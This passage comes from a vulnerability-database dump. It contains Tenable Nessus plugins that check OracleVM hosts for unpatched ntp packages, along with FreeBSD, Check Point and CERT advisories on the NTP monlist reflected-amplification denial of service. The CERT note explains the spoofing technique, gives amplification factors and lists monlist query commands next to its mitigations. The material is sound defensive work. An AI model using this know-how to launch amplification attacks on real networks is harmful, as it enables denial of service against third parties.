"cvss2": {}, "cvelist": ["CVE-2013-5211", "CVE-2016-7426", "CVE-2016-7429", "CVE-2016-7433", "CVE-2016-9310", "CVE-2016-9311"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:oracle:vm:ntp", "p-cpe:/a:oracle:vm:ntpdate", "cpe:/o:oracle:vm_server:3.3", "cpe:/o:oracle:vm_server:3.4"], "id": "ORACLEVM_OVMSA-2017-0038.NASL", "href": "https://www.tenable.com/plugins/nessus/97058", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2017-0038.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97058);\n script_version(\"3.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2013-5211\", \"CVE-2016-7426\", \"CVE-2016-7429\", \"CVE-2016-7433\", \"CVE-2016-9310\", \"CVE-2016-9311\");\n script_bugtraq_id(64692);\n\n script_name(english:\"OracleVM 3.3 / 3.4 : ntp (OVMSA-2017-0038)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - add disable monitor to default ntp.conf [CVE-2013-5211]\n\n - don't limit rate of packets from sources (CVE-2016-7426)\n\n - don't change interface from received packets\n (CVE-2016-7429)\n\n - fix calculation of root distance again (CVE-2016-7433)\n\n - require authentication for trap commands (CVE-2016-9310)\n\n - fix crash when reporting peer event to trappers\n (CVE-2016-9311)\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2017-February/000645.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?798cb9e7\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2017-February/000646.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3c07bfe5\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected ntp / ntpdate packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:ntpdate\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/01/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/02/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/02/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"(3\\.3|3\\.4)\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.3 / 3.4\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.3\", reference:\"ntp-4.2.6p5-10.0.1.el6_8.2\")) flag++;\nif (rpm_check(release:\"OVS3.3\", reference:\"ntpdate-4.2.6p5-10.0.1.el6_8.2\")) flag++;\n\nif (rpm_check(release:\"OVS3.4\", reference:\"ntp-4.2.6p5-10.0.1.el6_8.2\")) flag++;\nif (rpm_check(release:\"OVS3.4\", reference:\"ntpdate-4.2.6p5-10.0.1.el6_8.2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp / ntpdate\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:43:22", "description": "The remote OracleVM system is missing necessary patches to address critical security updates :\n\n - add disable monitor to default ntp.conf [CVE-2013-5211]\n\n - fix buffer overflow in parsing of address in ntpq and ntpdc (CVE-2018-12327)\n\n - fix CVE-2016-7429 patch to work correctly on multicast client (#1422973)\n\n - fix buffer overflow in datum refclock driver (CVE-2017-6462)\n\n - fix crash with invalid unpeer command (CVE-2017-6463)\n\n - fix potential crash with invalid server command (CVE-2017-6464)", "cvss3": {}, "published": "2018-12-21T00:00:00", "type": "nessus", "title": "OracleVM 3.3 / 3.4 : ntp (OVMSA-2018-0290)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211", "CVE-2016-7429", "CVE-2017-6462", "CVE-2017-6463", "CVE-2017-6464", "CVE-2018-12327"], "modified": "2020-03-27T00:00:00", "cpe": ["p-cpe:/a:oracle:vm:ntp", "p-cpe:/a:oracle:vm:ntpdate", "cpe:/o:oracle:vm_server:3.3", "cpe:/o:oracle:vm_server:3.4"], "id": "ORACLEVM_OVMSA-2018-0290.NASL", "href": "https://www.tenable.com/plugins/nessus/119823", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2018-0290.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(119823);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/27\");\n\n script_cve_id(\"CVE-2013-5211\", \"CVE-2016-7429\", \"CVE-2017-6462\", \"CVE-2017-6463\", \"CVE-2017-6464\", \"CVE-2018-12327\");\n script_bugtraq_id(64692);\n\n script_name(english:\"OracleVM 3.3 / 3.4 : ntp (OVMSA-2018-0290)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - add disable monitor to default ntp.conf [CVE-2013-5211]\n\n - fix buffer overflow in parsing of address in ntpq and\n ntpdc (CVE-2018-12327)\n\n - fix CVE-2016-7429 patch to work correctly on multicast\n client (#1422973)\n\n - fix buffer overflow in datum refclock driver\n (CVE-2017-6462)\n\n - fix crash with invalid unpeer command (CVE-2017-6463)\n\n - fix potential crash with invalid server command\n (CVE-2017-6464)\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2018-December/000925.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0a1122bd\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2018-December/000924.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?26f22544\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected ntp / ntpdate packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:ntpdate\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/01/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/12/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/12/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"(3\\.3|3\\.4)\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.3 / 3.4\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.3\", reference:\"ntp-4.2.6p5-15.0.1.el6_10\")) flag++;\nif (rpm_check(release:\"OVS3.3\", reference:\"ntpdate-4.2.6p5-15.0.1.el6_10\")) flag++;\n\nif (rpm_check(release:\"OVS3.4\", reference:\"ntp-4.2.6p5-15.0.1.el6_10\")) flag++;\nif (rpm_check(release:\"OVS3.4\", reference:\"ntpdate-4.2.6p5-15.0.1.el6_10\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp / ntpdate\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:44", "description": "The remote OracleVM system is missing necessary patches to address critical security updates :\n\n - add disable monitor to default ntp.conf [CVE-2013-5211]\n\n - fix buffer overflow in datum refclock driver (CVE-2017-6462)\n\n - fix crash with invalid unpeer command (CVE-2017-6463)\n\n - fix potential crash with invalid server command (CVE-2017-6464)\n\n - don't limit rate of packets from sources (CVE-2016-7426)\n\n - don't change interface from received packets (CVE-2016-7429)\n\n - fix calculation of root distance again (CVE-2016-7433)\n\n - require authentication for trap commands (CVE-2016-9310)\n\n - fix crash when reporting peer event to trappers (CVE-2016-9311)\n\n - don't allow spoofed packets to demobilize associations (CVE-2015-7979, CVE-2016-1547)\n\n - don't allow spoofed packet to enable symmetric interleaved mode (CVE-2016-1548)\n\n - check mode of new source in config command (CVE-2016-2518)\n\n - make MAC check resilient against timing attack (CVE-2016-1550)", "cvss3": {}, "published": "2017-10-27T00:00:00", "type": "nessus", "title": "OracleVM 3.3 / 3.4 : ntp (OVMSA-2017-0165)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211", "CVE-2015-7979", "CVE-2016-1547", "CVE-2016-1548", "CVE-2016-1550", "CVE-2016-2518", "CVE-2016-7426", "CVE-2016-7429", "CVE-2016-7433", "CVE-2016-9310", "CVE-2016-9311", "CVE-2017-6462", "CVE-2017-6463", "CVE-2017-6464"], "modified": "2021-01-04T00:00:00", "cpe": ["cpe:/o:oracle:vm_server:3.4", "p-cpe:/a:oracle:vm:ntp", "p-cpe:/a:oracle:vm:ntpdate", "cpe:/o:oracle:vm_server:3.3"], "id": "ORACLEVM_OVMSA-2017-0165.NASL", "href": "https://www.tenable.com/plugins/nessus/104204", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2017-0165.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104204);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2013-5211\", \"CVE-2015-7979\", \"CVE-2016-1547\", \"CVE-2016-1548\", \"CVE-2016-1550\", \"CVE-2016-2518\", \"CVE-2016-7426\", \"CVE-2016-7429\", \"CVE-2016-7433\", \"CVE-2016-9310\", \"CVE-2016-9311\", \"CVE-2017-6462\", \"CVE-2017-6463\", \"CVE-2017-6464\");\n script_bugtraq_id(64692);\n\n script_name(english:\"OracleVM 3.3 / 3.4 : ntp (OVMSA-2017-0165)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - add disable monitor to default ntp.conf [CVE-2013-5211]\n\n - fix buffer overflow in datum refclock driver\n (CVE-2017-6462)\n\n - fix crash with invalid unpeer command (CVE-2017-6463)\n\n - fix potential crash with invalid server command\n (CVE-2017-6464)\n\n - don't limit rate of packets from sources (CVE-2016-7426)\n\n - don't change interface from received packets\n (CVE-2016-7429)\n\n - fix calculation of root distance again (CVE-2016-7433)\n\n - require authentication for trap commands (CVE-2016-9310)\n\n - fix crash when reporting peer event to trappers\n (CVE-2016-9311)\n\n - don't allow spoofed packets to demobilize associations\n (CVE-2015-7979, CVE-2016-1547)\n\n - don't allow spoofed packet to enable symmetric\n interleaved mode (CVE-2016-1548)\n\n - check mode of new source in config command\n (CVE-2016-2518)\n\n - make MAC check resilient against timing attack\n (CVE-2016-1550)\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2017-October/000795.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7c1983e3\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2017-October/000796.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9454d3fb\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected ntp / ntpdate packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:ntpdate\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/01/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"(3\\.3|3\\.4)\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.3 / 3.4\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.3\", reference:\"ntp-4.2.6p5-12.0.1.el6_9.1\")) flag++;\nif (rpm_check(release:\"OVS3.3\", reference:\"ntpdate-4.2.6p5-12.0.1.el6_9.1\")) flag++;\n\nif (rpm_check(release:\"OVS3.4\", reference:\"ntp-4.2.6p5-12.0.1.el6_9.1\")) flag++;\nif (rpm_check(release:\"OVS3.4\", reference:\"ntpdate-4.2.6p5-12.0.1.el6_9.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp / ntpdate\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "checkpoint_advisories": [{"lastseen": "2022-11-28T06:51:15", "description": "There exists a design flaw in NTP servers that can allow attackers to perform DoS attacks against target machines. A remote attacker can leverage this flaw by sending a specially crafted request to an affected NTP server.", "cvss3": {}, "published": "2014-01-19T00:00:00", "type": "checkpoint_advisories", "title": "NTP Servers Monlist Command Denial of Service (CVE-2013-5211)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2022-11-27T00:00:00", "id": "CPAI-2014-0750", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "freebsd": [{"lastseen": "2023-09-12T17:06:05", "description": "\n\nntp.org reports:\n\nUnrestricted access to the monlist feature in\n\t ntp_request.c in ntpd in NTP before 4.2.7p26 allows remote\n\t attackers to cause a denial of service (traffic\n\t amplification) via forged (1) REQ_MON_GETLIST or (2)\n\t REQ_MON_GETLIST_1 requests, as exploited in the wild in\n\t December 2013\nUse noquery to your default restrictions to block all\n\t status queries.\nUse disable monitor to disable the ``ntpdc -c monlist''\n\t command while still allowing other status queries.\n\n\n", "cvss3": {}, "published": "2014-01-01T00:00:00", "type": "freebsd", "title": "ntpd DRDoS / Amplification Attack using ntpdc monlist command", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5211"], "modified": "2016-08-09T00:00:00", "id": "3D95C9A7-7D5C-11E3-A8C1-206A8A720317", "href": "https://vuxml.freebsd.org/freebsd/3d95c9a7-7d5c-11e3-a8c1-206a8a720317.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "cert": [{"lastseen": "2023-05-29T15:28:51", "description": "### Overview\n\nUDP protocols such as NTP can be abused to amplify denial-of-service attack traffic. Servers running the network time protocol (NTP) based on implementations of ntpd prior to version 4.2.7p26 that use the default unrestricted query configuration are susceptible to a reflected denial-of-service (DRDoS) attack. Other proprietary NTP implementations may also be affected.\n\n### Description\n\nNTP and other UDP-based protocols can be used to amplify denial-of-service attacks. Servers running the network time protocol (NTP) based on implementations of ntpd prior to version 4.2.7p26 that use the default unrestricted query configuration are susceptible to a reflected denial-of-service (DRDoS) attack. Other proprietary NTP implementations may also be affected. This is similar in scope to [DNS Amplification Attacks](<http://www.us-cert.gov/ncas/alerts/TA13-088A>).\n\nIn a reflected denial-of-service attack, the attacker spoofs the source address of attack traffic, replacing the source address with the target's address. Certain NTP control messages provide significant bandwidth amplification factors (BAF). \n \nNTP is designed for time synchronization, and may also implement other features such as server administration, maintenance, and monitoring. NTP relies on the user datagram protocol (UDP) to send and receive messages, which does not validate the source (IP address) of the sender. The NTP DRDoS attack is similar to the reflective DoS attacks used on open DNS resolvers. The attacker sends a packet with their source address being the IP of a victim. The NTP server replies to this request, but the number of bytes sent in the response is an amplified amount compared to the initial request, resulting in a denial-of-service on the victim. The two highest message types, `REQ_MON_GETLIST` and `REQ_MON_GETLIST_1` amplify the original request by a factor of up to 3660 and 5500 respectively. This bandwidth amplification factor (BAF) is a bandwidth multiplier based on the number of UDP payload bytes that are sent by the server in comparison to the UDP payload bytes of the request. Other message types can also be used in this attack, but `REQ_MON_GETLIST` and `REQ_MON_GETLIST_1 `create the biggest impact. \n \nThis vulnerability contains elements of [CWE-406](<http://cwe.mitre.org/data/definitions/406.html>): Insufficient Control of Network Message Volume (Network Amplification). \n \nMore information can be found in Christian Rossow's \"[Amplification DDoS Attacks (Ab)using NTP Servers](<http://christian-rossow.de/articles/Amplification_DDoS.php>)\" blog post. \n \nIn April 2014, Rapid7 published[ R7-2014-12](<https://community.rapid7.com/community/metasploit/blog/2014/08/25/r7-2014-12-more-amplification-vulnerabilities-in-ntp-allow-even-more-drdos-attacks>) documenting additional NTP commands that can amplify traffic and disclose potentially sensitive information. \n \n--- \n \n### Impact\n\nAn unauthenticated remote attacker may leverage the vulnerable NTP server to conduct a distributed reflective denial-of-service (DRDoS) attack on another user. \n \n--- \n \n### Solution\n\n**Apply an Update** \nAffected users are advised to update to [ntpd versions 4.2.7p26 and greater](<http://www.ntp.org/downloads.html>). \n \nntpd version 4.2.7p26 disables `REQ_MON_GETLIST` and `REQ_MON_GETLIST_1`, removing the two most significant BAF control messages. \n \nThe 4.2.6.x and earlier production branches are still vulnerable to this attack, however. \n \nIf an update is not possible, please consider one or more of the following workarounds. \n \n--- \n \n**Check if the amplified responses are enabled** \nEntering the following commands can help users verify if the `REQ_MON_GETLIST` and `REQ_MON_GETLIST_1` responses of NTP are currently enabled: \n \n`ntpq -c rv` \n`ntpdc -c sysinfo` \n`ntpdc -n -c monlist` \n \nThese commands only verify if the specified functions are enabled. If they are enabled, implement at least one of the following: \n \n**Perform Egress Filtering** \nConfigure your router/firewall to perform egress filtering, which may help to mitigate attacks that utilize source IP spoofing. Please refer to your product's documentation for instructions on how to perform egress filtering. \n \n**Disable status queries or restrict access.** \nThe ntpd status query features provided by ntpq/ntpdc will reveal some information about the system running ntpd (e.g. OS version, ntpd version) that you may not wish others to know. Disabling this feature may also help to reduce the likelihood of this vulnerability taking place. If the NTP implementation is vulnerable, adding the following lines to your `ntp.conf` file will restrict informational queries to authorized recipients only. \n \nIPV4: `restrict default kod nomodify notrap nopeer noquery` \nIPv6: `restrict -6 default kod nomodify notrap nopeer noquery` \nPlease note that a restart of the ntpd service is required for changes to take effect. \n \nIt is also possible to restrict access per network segment (be sure to modify line 3 to match your LAN settings) and per host (line 4): \n \n`restrict default noquery` \n`restrict localhost` \n`restrict 192.168.0.0 netmask 255.255.0.0` \n`restrict 192.168.1.27` \nPlease note that a restart of the ntpd service is required for changes to take effect. Please also note that the ntpq/ntpdc query capabilities provide useful Q/A and debugging information. Disabling these queries comes with a cost. \n \n--- \n \n### Vendor Information\n\n348126\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Cisco Systems, Inc. Affected\n\nNotified: September 17, 2013 Updated: September 17, 2013 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Hewlett-Packard Company __ Affected\n\nUpdated: January 14, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nA potential security vulnerability has been identified with HP-UX running NTP. The vulnerability could be exploited remotely to create a Denial of Service (DoS).\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04084148>\n\n### Meinberg Funkuhren GmbH & Co. KG __ Affected\n\nNotified: October 07, 2013 Updated: January 14, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nVendor is advising affected users to refer to [Meinberg Security Advisory MBGSA-1401](<http://www.meinbergglobal.com/english/news/meinberg-security-advisory-mbgsa-1401-ntp-monlist-network-traffic-amplification-attacks.htm>) for additional information.\n\n### Vendor References\n\n * <http://www.meinbergglobal.com/english/news/meinberg-security-advisory-mbgsa-1401-ntp-monlist-network-traffic-amplification-attacks.htm>\n\n### NEC Corporation __ Affected\n\nUpdated: March 26, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe provide information on this issue at the following URL <http://jpn.nec.com/security-info/secinfo/nv14-001.html> (only in Japanese)\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://jpn.nec.com/security-info/secinfo/nv14-001.html>\n\n### Network Time Protocol Affected\n\nNotified: September 16, 2013 Updated: September 17, 2013 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Juniper Networks, Inc. Unknown\n\nNotified: October 07, 2013 Updated: October 07, 2013 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n \n\n\n### CVSS Metrics\n\nGroup | Score | Vector \n---|---|--- \nBase | 7.8 | AV:N/AC:L/Au:N/C:N/I:N/A:C \nTemporal | 6.1 | E:POC/RL:OF/RC:C \nEnvironmental | 4.6 | CDP:ND/TD:M/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References\n\n * <http://bugs.ntp.org/show_bug.cgi?id=1532>\n * <http://cwe.mitre.org/data/definitions/406.html>\n * <http://www.nwtime.org/>\n * <http://ntp.org>\n * <http://www.cisco.com/en/US/products/ps9494/Products_Sub_Category_Home.html>\n * <http://www.us-cert.gov/ncas/alerts/TA13-088A>\n * <http://www.prolexic.com/knowledge-center-white-paper-series-snmp-ntp-chargen-reflection-attacks-drdos-ddos.html>\n * <http://www.meinbergglobal.com/english/news/meinberg-security-advisory-mbgsa-1401-ntp-monlist-network-traffic-amplification-attacks.htm>\n * <http://christian-rossow.de/articles/Amplification_DDoS.php>\n * 